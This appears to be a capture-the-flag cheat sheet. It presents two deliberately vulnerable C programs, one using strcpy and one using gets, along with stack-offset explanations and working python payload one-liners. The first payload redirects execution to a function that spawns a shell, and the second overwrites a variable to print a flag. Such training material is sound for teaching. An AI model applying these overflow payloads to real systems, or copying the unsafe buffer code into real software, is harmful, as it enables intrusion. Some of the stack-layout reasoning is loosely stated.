Easy - No Protections

Simple Buffer Overflow (no protection) - Function call

# Code
void copy_ordre(char *arg)
{
        char ordre[50];
        strcpy(ordre,arg);
        printf("\nOrdre reçu : %s\n\n",ordre); 
        }

int main(int argc, char** argv) {
    if(argc < 2) {
        printf("Bienvenue, humain. Donnez-nous vos ordres. En cas de bonne réponse, nous vous épargnerons. Le cas échéant, nous détruirons la terre.\n");
        printf("Usage: %s <ordre>\n", argv[0]);
        exit(0);
    }
    printf("Bienvenue, humain. Donnez-nous vos ordres. En cas de bonne réponse, nous vous épargnerons. Le cas échéant, nous détruirons la terre.\n");
    copy_ordre(argv[1]);
    earth_destroy();
    return 0;
}

void earth_destroy() {
    printf("Mauvaise réponse ! Nous détruirons votre planète dans quelques minutes.\n");
}

void earth_alive() {
    printf("Nous nous avouons vaincu. Vous avez gagné, nous vous rendons la terre !\n");
    execve("/bin/sh", NULL, NULL);
}
# Explanations and Exploit
# The goal is to call earth_alive() function
# The buffer is 50 bytes long, so by submitting 50+ char, you can override what is after
# You have EIP, EBP and one argument (char) on the stack, so 12 bytes
# So, to override what you want and call the function, you will need to send 62 char before the payload

# The payload is the function adress you want to send
$ nm ./pwn1 | grep "earth_alive"
08048acb T earth_alive

# So, the payload will be the following
./pwn1 $(python -c 'print "A"*62 + "\xcb\x8a\x04\x08"')


Simple BoF - Int override

# Code
int main() {
    char buf[20];
    int x = 0;
    gets(buf);

    if (x == 1234) {
//        gid_t gid = getegid();
//        setresgid(gid, gid, gid);
        FILE *fp;
        fp = fopen("flag.txt", "r");
        char flag[64];
        fgets(flag, 64, (FILE*) fp);
        printf("Oh, un flag : %s\n", flag);
    }

    printf("x value : %d\n", x);
    return 0;
}
# Exploitation and Explanations
# You want to override the “x” value
# In the stack, 20 bytes are allowed to the buffer and 4 bytes are allowed to a pointer for this buffer.
# After that comes the value of x, so you can overflow here
$ python -c 'print "a"*24 + "\xd2\x04\x00\x00"' | ./pwn0
$ python -c 'print "a"*24 + "\xd2\x04"' | ./pwn0
$ python -c 'print "a"*22 + "\x00\x00\xd2\x04"' | ./pwn0